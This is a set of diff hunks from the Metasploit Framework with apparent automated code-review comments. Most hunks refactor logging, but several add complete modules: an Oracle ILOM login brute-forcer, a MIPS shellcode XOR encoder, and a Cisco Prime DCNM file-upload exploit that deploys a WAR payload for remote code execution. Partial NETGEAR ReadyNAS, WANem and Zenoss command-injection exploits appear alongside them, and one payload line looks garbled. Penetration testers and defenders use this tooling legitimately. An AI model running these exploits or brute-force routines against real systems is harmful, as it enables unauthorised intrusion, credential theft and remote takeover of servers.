@ -120,17 +119,17 @@ class Metasploit4 < Msf::Auxiliary
loot = Rex::Text.ungzip($1)
end
if not loot or loot.empty?
print_error("#{@peer} - Failed to retrieve the SiteScope Configuration")
print_error("#{peer} - Failed to retrieve the SiteScope Configuration")
return
end
path = store_loot('hp.sitescope.configuration', 'application/octet-stream', rhost, loot, cid, "#{rhost} HP SiteScope Configuration")
print_status("#{@peer} - HP SiteScope Configuration saved in #{path}")
print_status("#{@peer} - HP SiteScope Configuration is saved as Java serialization data")
print_status("#{peer} - HP SiteScope Configuration saved in #{path}")
print_status("#{peer} - HP SiteScope Configuration is saved as Java serialization data")
return
end
print_error("#{@peer} - Failed to retrieve the SiteScope Configuration")
print_error("#{peer} - Failed to retrieve the SiteScope Configuration")
end
end


@ -47,11 +47,10 @@ class Metasploit4 < Msf::Auxiliary
end
def run_host(ip)
@peer = "#{rhost}:#{rport}"
@uri = normalize_uri(target_uri.path)
@uri << '/' if @uri[-1,1] != '/'
print_status("#{@peer} - Connecting to SiteScope SOAP Interface")
print_status("#{peer} - Connecting to SiteScope SOAP Interface")
uri = normalize_uri(@uri, 'services/APIMonitorImpl')
@ -60,7 +59,7 @@ class Metasploit4 < Msf::Auxiliary
'method' => 'GET'})
if not res
print_error("#{@peer} - Unable to connect")
print_error("#{peer} - Unable to connect")
return
end
@ -89,7 +88,7 @@ class Metasploit4 < Msf::Auxiliary
data << "</wsns0:Body>" + "\r\n"
data << "</wsns0:Envelope>" + "\r\n"
print_status("#{@peer} - Retrieving the file contents")
print_status("#{peer} - Retrieving the file contents")
uri = normalize_uri(@uri, 'services/APIMonitorImpl')
@ -105,16 +104,16 @@ class Metasploit4 < Msf::Auxiliary
if res and res.code == 200 and res.body =~ /<loadFileContentReturn xsi:type="xsd:string">(.*)<\/loadFileContentReturn>/m
loot = CGI.unescapeHTML($1)
if not loot or loot.empty?
print_status("#{@peer} - Retrieved empty file")
print_status("#{peer} - Retrieved empty file")
return
end
f = ::File.basename(datastore['RFILE'])
path = store_loot('hp.sitescope.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE'])
print_status("#{@peer} - #{datastore['RFILE']} saved in #{path}")
print_status("#{peer} - #{datastore['RFILE']} saved in #{path}")
return
end
print_error("#{@peer} - Failed to retrieve the file")
print_error("#{peer} - Failed to retrieve the file")
end
end


@ -16,8 +16,8 @@ class Metasploit3 < Msf::Auxiliary
super(update_info(info,
'Name' => 'OpenMind Message-OS Portal Login Brute Force Utility',
'Description' => %{
This module scans for OpenMind Message-OS provisioning web login portal, and performs login brute force
to identify valid credentials.
This module scans for OpenMind Message-OS provisioning web login portal, and
performs a login brute force attack to identify valid credentials.
},
'Author' =>
[


@ -0,0 +1,115 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
def initialize(info={})
super(update_info(info,
'Name' => 'Oracle ILO Manager Login Brute Force Utility',
'Description' => %{
This module scans for Oracle Integrated Lights Out Manager (ILO) login portal, and
performs a login brute force attack to identify valid credentials.
},
'Author' =>
[
'Karn Ganeshen <KarnGaneshen[at]gmail.com>',
],
'License' => MSF_LICENSE,
'DefaultOptions' => { 'SSL' => true }
))
register_options(
[
Opt::RPORT(443)
], self.class)
end
def run_host(ip)
unless is_app_oilom?
return
end
print_status("#{peer} - Starting login brute force...")
each_user_pass do |user, pass|
do_login(user, pass)
end
end
#
# What's the point of running this module if the target actually isn't Oracle ILOM
#
def is_app_oilom?
begin
res = send_request_cgi(
{
'uri' => '/iPages/i_login.asp',
'method' => 'GET'
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
vprint_error("#{peer} - HTTP Connection Failed...")
return false
end
if (res and res.code == 200 and res.headers['Server'].include?("Oracle-ILOM-Web-Server") and res.body.include?("Integrated Lights Out Manager"))
vprint_good("#{peer} - Running Oracle Integrated Lights Out Manager portal...")
return true
else
vprint_error("#{peer} - Application is not Oracle ILOM. Module will not continue.")
return false
end
end
#
# Brute-force the login page
#
def do_login(user, pass)
vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}")
begin
res = send_request_cgi(
{
'uri' => '/iPages/loginProcessor.asp',
'method' => 'POST',
'vars_post' =>
{
'sclink' => '',
'username' => user,
'password' => pass,
'button' => 'Log+In'
}
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
vprint_error("#{peer} - HTTP Connection Failed...")
return :abort
end
if (res and res.code == 200 and res.body.include?("/iPages/suntab.asp") and res.body.include?("SetWebSessionString"))
print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
report_hash = {
:host => rhost,
:port => rport,
:sname => 'Oracle Integrated Lights Out Manager Portal',
:user => user,
:pass => pass,
:active => true,
:type => 'password'
}
report_auth_info(report_hash)
return :next_user
else
vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
end
end
end
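Review bot: `run_host` spends three lines on `unless is_app_oilom? ... return ... end` where the modifier form `return unless is_app_oilom?` is the idiom, and both `is_app_oilom?` and `do_login` test `if (res and res.code == 200 and ...)` with `and` plus redundant parentheses; `and` binds lower than assignment and is reserved for control flow in Ruby style, so these read better as `if res && res.code == 200 && ...`, which is also how the Cisco ASA ASDM module added by the same commit writes its checks. The trailing comma after the single author entry in `'Author' => [ ... ]` is harmless but inconsistent with the other new modules.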


@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
'cookie' => sid
})
rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
vprint_error("#{@peer} - Service failed to respond")
vprint_error("#{peer} - Service failed to respond")
return :abort
end
@ -86,9 +86,9 @@ class Metasploit3 < Msf::Auxiliary
when /User name already confirmed/
return :skip_user
when /Invalid password/
vprint_status("#{@peer} - Username found: #{user}")
vprint_status("#{peer} - Username found: #{user}")
else /\<a href="process\.php\?logout=1"\>/
print_good("#{@peer} - Successful login: \"#{user}:#{pass}\"")
print_good("#{peer} - Successful login: \"#{user}:#{pass}\"")
report_auth_info({
:host => rhost,
:port => rport,
@ -108,10 +108,9 @@ class Metasploit3 < Msf::Auxiliary
def run
@uri = normalize_uri(target_uri.path)
@uri.path << "/" if @uri.path[-1, 1] != "/"
@peer = "#{rhost}:#{rport}"
each_user_pass { |user, pass|
vprint_status("#{@peer} - Trying \"#{user}:#{pass}\"")
vprint_status("#{peer} - Trying \"#{user}:#{pass}\"")
do_login(user, pass)
}
end
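Review bot: In `do_login`, the line `else /\<a href="process\.php\?logout=1"\>/` is an `else` followed by a regex literal used as a bare statement rather than a `when` clause, so the regex is evaluated and discarded and every response matching neither `/User name already confirmed/` nor `/Invalid password/` reaches the `print_good` branch and is reported as a successful login; it reads as an intended `when /\<a href="process\.php\?logout=1"\>/` with a separate `else` for the failure case. This is a pre-existing context line, but the commit rewrites the output lines on either side of it, so it is worth fixing in the same pass. The `case` expression and the rest of `do_login` are outside the hunk.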


@ -0,0 +1,146 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'metasm'
class Metasploit3 < Msf::Encoder::Xor
Rank = NormalRanking
def initialize
super(
'Name' => 'Byte XORi Encoder',
'Description' => %q{
Mips Web server exploit friendly xor encoder. This encoder has been found useful on
situations where '&' (0x26) is a badchar. Since 0x26 is the xor's opcode on MIPS
architectures, this one is based on the xori instruction.
},
'Author' =>
[
'Julien Tinnes <julien at cr0.org>', # original longxor encoder, which this one is based on
'juan vazquez' # byte_xori encoder
],
'Arch' => ARCH_MIPSBE,
'License' => MSF_LICENSE,
'Decoder' =>
{
'KeySize' => 1,
'BlockSize' => 1,
'KeyPack' => 'C',
})
end
#
# Returns the decoder stub that is adjusted for the size of the buffer
# being encoded.
#
def decoder_stub(state)
# add 4 number of passes for the space reserved for the key, at the end of the decoder stub
# (see commented source)
number_of_passes=state.buf.length+4
raise InvalidPayloadSizeException.new("The payload being encoded is too long (#{state.buf.length} bytes)") if number_of_passes > 32766
# 16-bits not (again, see also commented source)
reg_14 = (number_of_passes+1)^0xFFFF
decoder = Metasm::Shellcode.assemble(Metasm::MIPS.new(:big), <<EOS).encoded.data
main:
li macro reg, imm
addiu reg, $0, imm ; 0x24xxyyyy - xx: reg #, yyyy: imm # imm must be equal or less than 0x7fff
endm
li ($14, #{reg_14}) ; 0x240exxxx - store in $14 the number of passes (two's complement) - xxxx (number of passes)
nor $14, $14, $0 ; 0x01c07027 - get in $14 the number of passes
li ($11,-69) ; 0x240bffbb - store in $11 the offset to the end of the decoder (two's complement) (from the addu instr)
; acts as getpc
next:
bltzal $8, next ; 0x0510ffff - branch to next if $8 < 0, store return address in $31 ($ra); pipelining executes next instr.
slti $8, $0, 0x#{slti_imm(state)} ; 0x2808xxxx - Set $8 = 0; Set $8 = 1 if $0 < imm; else $8 = 0 / xxxx: imm
nor $11, $11, $0 ; 0x01605827 - get in $11 the offset to the end of the decoder (from the addu instr)
addu $25, $31, $11 ; 0x03ebc821 - get in $25 a pointer to the end of the decoder stub
slti $23, $0, 0x#{slti_imm(state)} ; 0x2817xxxx - Set $23 = 0 (Set $23 = 1 if $0 < imm; else $23 = 0) / xxxx: imm
lb $17, -1($25) ; 0x8f31fffc - Load xor key in $17 (stored on the last byte of the decoder stub)
; Init $6 and $15
li ($13, -4) ; 0x240dfffc - $13 = -4
nor $6, $13, $0 ; 0x01a03027 - $6 = 3 ; used to easily get the cacheflush parameter
addi $15, $6, -2 ; 0x20cffffe - $15 = 1 ($15 = decoding loop counter increment)
; In order avoid null bytes, decode also the xor key, so memory can be
; referenced with offset -1
loop:
lb $8, -4($25) ; 0x8f28fffc - Load in $8 the byte to decode
addu $23, $23, $15 ; 0x02efb821 - Increment the counter ($23)
xori $3, $8, 0x#{padded_key(state)} ; 0x01111826 - xori decoding instruction, store the decoded byte on $3
#{set_on_less_than(state)} ; 0x02eef0xx - $30 = 1 if $23 < $14; else $30 = 0 (update branch condition) / xx: 0x2b if slti, 0x2a if slt
sb $3, -4($25) ; 0xaf23fffc - Store decoded byte on memory
bne $0, $30, loop ; 0x17c0fff9 - branch to loop if $30 != 0 (ranch while bytes to decode)
addu $25, $25, $15 ; 0x032dc821 - next instruction to decode, executed because of the pipelining
li ($2, 4147) ; 0x24021033 - cacheflush sytem call
syscall 0x52950 ; 0x014a540c
nop ; encoded shellcoded must be here (xor key right here ;) after decoding will result in a nop
EOS
return decoder
end
def padded_key(state, size=1)
key = Rex::Text.rand_text(size, state.badchars)
key << [state.key].pack("C")
return key.unpack("n")[0].to_s(16)
end
# Returns an two-bytes immediate value without badchars. The value must be
# on the 0x8000-0x8fff so it is used as negative value by slti (set less
# than signed immediate)
def slti_imm(state)
imm = Rex::Text.rand_text(2, state.badchars + (0x00..0x7f).to_a.pack("C*"))
return imm.unpack("n")[0].to_s(16)
end
# Since 0x14 contains the number of passes, and because of the li macro, can't be
# longer than 0x7fff, both sltu (unsigned) and slt (signed) operations can be used
# here
def set_on_less_than(state)
instructions = {
"sltu $30, $23, $14" => "\x02\xee\xf0\x2b", # set less than unsigned
"slt $30, $23, $14" => "\x02\xee\xf0\x2a" # set less than
}
instructions.each do |k,v|
if Rex::Text.badchar_index(v, state.badchars) == nil
return k
end
end
raise BadcharError.new,
"The #{self.name} encoder failed to encode the decoder stub without bad characters.",
caller
end
def encode_finalize_stub(state, stub)
# Including the key into the stub by ourselves because it should be located
# in the last 4 bytes of the decoder stub. In this way decoding will convert
# these bytes into a nop instruction (0x00000000). The Msf::Encoder only supports
# one decoder_key_offset position
real_key = state.key
stub[-4, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack)
stub[-3, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack)
stub[-2, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack)
stub[-1, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack)
return stub
end
end
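Review bot: `encode_finalize_stub` repeats `stub[-k, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack)` four times for k = 4..1; since the `Decoder` hash declares `'KeySize' => 1`, the four writes collapse to `stub[-4, 4] = [real_key.to_i].pack(state.decoder_key_pack) * 4`, which also makes the "last 4 bytes" intent stated in the comment visible in the code. In `set_on_less_than`, `== nil` should be `.nil?`, and the `each`-then-`return k` loop is what `instructions.find { |_, v| ... }` expresses directly. Two comments need correcting: `# Since 0x14 contains the number of passes` refers to register `$14`, and `; 0x24021033 - cacheflush sytem call` should read `system call`.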


@ -48,10 +48,6 @@ class Metasploit3 < Msf::Exploit::Remote
], self.class)
end
def peer
return "#{rhost}:#{rport}"
end
def uri
return target_uri.path
end


@ -140,40 +140,38 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
@peer = "#{rhost}:#{rport}"
print_status("#{@peer} - Trying to login")
print_status("#{peer} - Trying to login")
if login
print_good("#{@peer} - Login successful")
print_good("#{peer} - Login successful")
else
fail_with(Failure::NoAccess, "#{@peer} - Login failed, review USERNAME and PASSWORD options")
fail_with(Failure::NoAccess, "#{peer} - Login failed, review USERNAME and PASSWORD options")
end
exploit_native
end
def exploit_native
print_status("#{@peer} - Uploading executable Payload file")
print_status("#{peer} - Uploading executable Payload file")
elf = payload.encoded_exe
elf_location = "/tmp"
elf_filename = "#{rand_text_alpha_lower(8)}.elf"
if upload_file(elf_location, elf_filename, elf)
register_files_for_cleanup("#{elf_location}/#{elf_filename}")
else
fail_with(Failure::Unknown, "#{@peer} - Payload upload failed")
fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
end
print_status("#{@peer} - Uploading JSP to execute the payload")
print_status("#{peer} - Uploading JSP to execute the payload")
jsp = jsp_execute_command("#{elf_location}/#{elf_filename}")
jsp_location = "/usr/jakarta/tomcat/webapps/ROOT/m"
jsp_filename = "#{rand_text_alpha_lower(8)}.jsp"
if upload_file(jsp_location, jsp_filename, jsp)
register_files_for_cleanup("#{jsp_location}/#{jsp_filename}")
else
fail_with(Failure::Unknown, "#{@peer} - JSP upload failed")
fail_with(Failure::Unknown, "#{peer} - JSP upload failed")
end
print_status("#{@peer} - Executing payload")
print_status("#{peer} - Executing payload")
send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, "m", jsp_filename),


@ -15,10 +15,9 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'NETGEAR ReadyNAS Perl Code Evaluation',
'Description' => %q{
This module exploits a Perl code injection on NETGEAR ReadyNAS 4.2.23 and 4.1.11. The
vulnerability exists on the web fronted, specifically on the np_handler.pl component,
due to the insecure usage of the eval() perl function. This module has been tested
successfully on a NETGEAR ReadyNAS 4.2.23 Firmware emulated environment, not on real
hardware.
vulnerability exists on the web front end, specifically in the np_handler.pl component,
due to an insecure usage of the eval() perl function. This module has been tested
successfully on a NETGEAR ReadyNAS 4.2.23 Firmware emulated environment.
},
'Author' =>
[
@ -49,6 +48,8 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Targets' =>
[
# Tested on an emulated environment, need to check this
# against a real device
[ 'NETGEAR ReadyNAS 4.2.23', { }]
],
'DefaultOptions' =>


@ -69,11 +69,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
@peer = "#{rhost}:#{rport}"
# retrieve software version from login page
print_status("#{@peer} - Sending check")
print_status("#{peer} - Sending check")
begin
res = send_request_cgi({
'uri' => '/'
@ -86,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed")
print_error("#{peer} - Connection failed")
end
return Exploit::CheckCode::Unknown
@ -98,14 +95,12 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
@peer = "#{rhost}:#{rport}"
user = datastore['USERNAME']
pass = datastore['PASSWORD']
cmd = Rex::Text.uri_encode("&#{payload.raw}&")
# send payload
print_status("#{@peer} - Sending payload (#{payload.raw.length} bytes)")
print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)")
begin
res = send_request_cgi({
'uri' => "/admin/system.html?step=2&device=lo#{cmd}",
@ -116,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
if res and res.code == 200 and res.body =~ /<title>System : Network Setup<\/title>/
print_good("#{@peer} - Payload sent successfully")
print_good("#{peer} - Payload sent successfully")
elsif res and res.code == 302 and res.headers['Location'] =~ /\/index\.html\?redirect/
fail_with(Failure::NoAccess, 'Authentication failed')
else


@ -65,12 +65,11 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
@peer = "#{rhost}:#{rport}"
fingerprint = Rex::Text.rand_text_alphanumeric(rand(8)+4)
data = "pc=127.0.0.1; "
data << Rex::Text.uri_encode("echo #{fingerprint}")
data << "%26"
print_status("#{@peer} - Sending check")
print_status("#{peer} - Sending check")
begin
res = send_request_cgi({
@ -79,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
'data' => data
}, 25)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed")
print_error("#{peer} - Connection failed")
return Exploit::CheckCode::Unknown
end
@ -91,11 +90,10 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
@peer = "#{rhost}:#{rport}"
data = "pc=127.0.0.1; "
data << Rex::Text.uri_encode(payload.raw)
data << "%26"
print_status("#{@peer} - Sending payload (#{payload.raw.length} bytes)")
print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)")
begin
res = send_request_cgi({
'uri' => '/WANem/result.php',
@ -103,12 +101,12 @@ class Metasploit3 < Msf::Exploit::Remote
'data' => data
}, 25)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed")
print_error("#{peer} - Connection failed")
end
if res and res.code == 200
print_good("#{@peer} - Payload sent successfully")
print_good("#{peer} - Payload sent successfully")
else
print_error("#{@peer} - Sending payload failed")
print_error("#{peer} - Sending payload failed")
end
end
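Review bot: In `exploit`, the `rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout` clause prints `Connection failed` and then falls through to `if res and res.code == 200`, where `res` is nil, so a second, misleading `Sending payload failed` message is printed for the same failure; `check` in the same file returns from its rescue, and `exploit` should do the same with a `return` after its `print_error`. The `send_request_cgi` argument hash between the two hunks is unchanged and outside them.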


@ -65,11 +65,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
@peer = "#{rhost}:#{rport}"
# retrieve software version from config file
print_status("#{@peer} - Sending check")
print_status("#{peer} - Sending check")
begin
res = send_request_cgi({
'uri' => '/config/global.conf'
@ -82,15 +79,13 @@ class Metasploit3 < Msf::Exploit::Remote
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed")
print_error("#{peer} - Connection failed")
end
return Exploit::CheckCode::Unknown
end
def exploit
@peer = "#{rhost}:#{rport}"
user = datastore['USERNAME']
pass = datastore['PASSWORD']
auth = Rex::Text.encode_base64("#{user}:#{pass}")
@ -98,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
lines = rand(100) + 1
# send payload
print_status("#{@peer} - Sending payload (#{payload.encoded.length} bytes)")
print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)")
begin
res = send_request_cgi({
'uri' => "/index.cgi?nlines=#{lines}&action=See+logs&id=2-2&filelog=#{cmd}",


@ -63,9 +63,6 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
@peer = "#{rhost}:#{rport}"
# retrieve software version from login page
begin
res = send_request_raw({
@ -76,22 +73,20 @@ class Metasploit3 < Msf::Exploit::Remote
return Exploit::CheckCode::Detected if res.body =~ /<link rel="shortcut icon" type="image\/x\-icon" href="\/zport\/dmd\/favicon\.ico" \/>/
return Exploit::CheckCode::Safe
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp
print_error("#{@peer} - Connection failed")
print_error("#{peer} - Connection failed")
end
return Exploit::CheckCode::Unknown
end
def exploit
@peer = "#{rhost}:#{rport}"
username = datastore['USERNAME']
password = datastore['PASSWORD']
command = URI.encode(payload.encoded)+"%26"
postdata = "__ac_name=#{username}&__ac_password=#{password}&daemon=#{command}"
# send payload
print_status("#{@peer} - Sending payload to Zenoss (#{command.length.to_s} bytes)")
print_status("#{peer} - Sending payload to Zenoss (#{command.length.to_s} bytes)")
begin
res = send_request_cgi({
'method' => 'POST',
@ -99,14 +94,14 @@ class Metasploit3 < Msf::Exploit::Remote
'data' => "#{postdata}",
})
if res and res['Bobo-Exception-Type'] =~ /^Unauthorized$/
print_error("#{@peer} - Authentication failed. Incorrect username/password.")
print_error("#{peer} - Authentication failed. Incorrect username/password.")
return
end
print_status("#{@peer} - Sent payload successfully")
print_status("#{peer} - Sent payload successfully")
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed")
print_error("#{peer} - Connection failed")
rescue
print_error("#{@peer} - Sending payload failed")
print_error("#{peer} - Sending payload failed")
end
handler
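Review bot: The rescue clause in `check` names `::Rex::ConnectionTimeoutp` instead of `::Rex::ConnectionTimeout`; Ruby resolves the constants of a `rescue` list only when an exception reaches them, so a timed-out check would surface a NameError rather than the intended "Connection failed" message. The fix is the one-character change `rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout`. The bare `rescue` at the end of `exploit` also swallows every StandardError, including bugs in the module itself, under "Sending payload failed"; binding the exception and printing `e.message` (or narrowing the class) would keep such failures diagnosable. The `check` method spans both hunks of this section and `exploit` continues past the last one.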


@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
post_data = data.to_s
post_data = post_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
print_status("#{@peer} - Uploading payload (#{p.length.to_s} bytes)...")
print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php"),
@ -87,14 +87,14 @@ class Metasploit3 < Msf::Exploit::Remote
})
if not res
print_error("#{@peer} - No response from host")
print_error("#{peer} - No response from host")
return
end
print_status("#{@peer} - Requesting '#{php_fname}'...")
print_status("#{peer} - Requesting '#{php_fname}'...")
res = send_request_raw({'uri'=>normalize_uri("#{base}/banners/#{php_fname}")})
if res and res.code == 404
print_error("#{@peer} - Upload unsuccessful: #{res.code.to_s}")
print_error("#{peer} - Upload unsuccessful: #{res.code.to_s}")
return
end
@ -103,8 +103,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
@peer = "#{rhost}:#{rport}"
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/'
base = File.dirname("#{uri}.")


@ -0,0 +1,153 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco Prime Data Center Network Manager Arbitrary File Upload',
'Description' => %q{
This module exploits a code execution flaw in Cisco Data Center Network Manager. The
vulnerability exists in processImageSave.jsp, which can be abused through a directory
traversal and a null byte injection to upload arbitrary files. The autodeploy JBoss
application server feature is used to achieve remote code execution. This module has been
tested successfully on Cisco Prime Data Center Network Manager 6.1(2) on Windows 2008 R2
(64 bits).
},
'Author' =>
[
'rgod <rgod[at]autistici.org>', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-5486'],
[ 'OSVDB', '97426' ],
[ 'ZDI', '13-254' ],
[ 'URL', 'http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130918-dcnm' ]
],
'Privileged' => true,
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'Cisco DCNM 6.1(2) / Java Universal',
{
'AutoDeployPath' => "../../../../../deploy",
'CleanupPath' => "../../jboss-4.2.2.GA/server/fm/deploy"
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 18 2013'))
register_options(
[
OptString.new('TARGETURI', [true, 'Path to Cisco DCNM', '/']),
OptInt.new('ATTEMPTS', [true, 'The number of attempts to execute the payload (auto deployed by JBoss)', 10])
], self.class)
end
def upload_file(location, filename, contents)
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, "cues_utility", "charts", "processImageSave.jsp"),
'method' => 'POST',
'encode_params' => false,
'vars_post' =>
{
"mode" => "save",
"savefile" => "true",
"chartid" => "#{location}/#(unknown)%00",
"data" => Rex::Text.uri_encode(Rex::Text.encode_base64(contents))
}
})
if res and res.code == 200 and res.body.to_s =~ /success/
return true
else
return false
end
end
def check
version = ""
res = send_request_cgi({
'url' => target_uri.to_s,
'method' => 'GET'
})
unless res
return Exploit::CheckCode::Unknown
end
if res.code == 200 and
res.body.to_s =~ /Data Center Network Manager/ and
res.body.to_s =~ /<div class="productVersion">Version: (.*)<\/div>/
version = $1
print_status("Cisco Primer Data Center Network Manager version #{version} found")
elsif res.code == 200 and
res.body.to_s =~ /Data Center Network Manager/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
if version =~ /6\.1/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
attempts = datastore['ATTEMPTS']
fail_with(Failure::BadConfig, "#{peer} - Configure 1 or more ATTEMPTS") unless attempts > 0
app_base = rand_text_alphanumeric(4+rand(32-4))
# By default uploads land here: C:\Program Files\Cisco Systems\dcm\jboss-4.2.2.GA\server\fm\tmp\deploy\tmp3409372432509144123dcm-exp.war\cues_utility\charts
# Auto deploy dir is here C:\Program Files\Cisco Systems\dcm\jboss-4.2.2.GA\server\fm\deploy
# Sessions pwd is here C:\Program Files\Cisco Systems\dcm\fm\bin
war = payload.encoded_war({ :app_name => app_base }).to_s
war_filename = "#{app_base}.war"
war_location = target['AutoDeployPath']
print_status("#{peer} - Uploading WAR file #{war_filename}...")
res = upload_file(war_location, war_filename, war)
if res
register_files_for_cleanup("#{target['CleanupPath']}/#{war_filename}")
else
fail_with(Failure::Unknown, "#{peer} - Failed to upload the WAR payload")
end
attempts.times do
select(nil, nil, nil, 2)
# Now make a request to trigger the newly deployed war
print_status("#{peer} - Attempting to launch payload in deployed WAR...")
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
'method' => 'GET'
})
# Failure. The request timed out or the server went away.
fail_with(Failure::TimeoutExpired, "#{peer} - The request timed out or the server went away.") if res.nil?
# Success! Triggered the payload, should have a shell incoming
break if res.code == 200
end
end
end
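Review bot: `check` passes the target path under the key `'url'` (`'url' => target_uri.to_s`) while every other request in the file uses `'uri'`; the key is presumably ignored by `send_request_cgi`, so the fingerprint request goes to the default path rather than TARGETURI and only coincidentally works with the default of `/`. Change it to `'uri' => normalize_uri(target_uri.path)`. `upload_file` never uses its `filename` parameter, and the `chartid` value `"#{location}/#(unknown)%00"` looks garbled in this listing; confirm it should interpolate `filename` so the WAR is written under the same name that `register_files_for_cleanup` records. The version test `version =~ /6\.1/` is a substring match that would also flag e.g. 6.10 or 16.1 as vulnerable; anchoring it, `version =~ /\A6\.1\b/`, would be safer, and the status message "Cisco Primer Data Center" should read "Cisco Prime".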


@ -99,20 +99,19 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
base = normalize_uri(target_uri.path)
base << '/' if base[-1, 1] != '/'
@peer = "#{rhost}:#{rport}"
# upload PHP payload to upload/___1/
print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
fname = rand_text_alphanumeric(rand(10)+6) + '.php'
php = %Q|<?php #{payload.encoded} ?>|
res = upload(base, fname, php)
if res.nil?
print_error("#{@peer} - Uploading PHP payload failed")
print_error("#{peer} - Uploading PHP payload failed")
return
end
# retrieve and execute PHP payload
print_status("#{@peer} - Retrieving file: #{fname}")
print_status("#{peer} - Retrieving file: #{fname}")
send_request_raw({
'method' => 'GET',
'uri' => normalize_uri(base, "upload/___1/#{fname}")


@ -135,22 +135,22 @@ class Metasploit3 < Msf::Exploit::Remote
base = target_uri.path
base << '/' if base[-1, 1] != '/'
@peer = "#{rhost}:#{rport}"
@fname= rand_text_alphanumeric(rand(10)+6) + '.php'
user = datastore['USERNAME']
datastore['COOKIE'] = "eXtplorer="+rand_text_alpha_lower(26)+";"
# bypass auth
print_status("#{@peer} - Authenticating as user (#{user})")
print_status("#{peer} - Authenticating as user (#{user})")
res = auth_bypass(base, user)
if res and res.code == 200 and res.body =~ /Are you sure you want to delete these/
print_status("#{@peer} - Authenticated successfully")
print_status("#{peer} - Authenticated successfully")
else
fail_with(Failure::NoAccess, "#{@peer} - Authentication failed")
fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
end
# search for writable directories
print_status("#{@peer} - Retrieving writable subdirectories")
print_status("#{peer} - Retrieving writable subdirectories")
begin
res = send_request_cgi({
'method' => 'POST',
@ -159,32 +159,32 @@ class Metasploit3 < Msf::Exploit::Remote
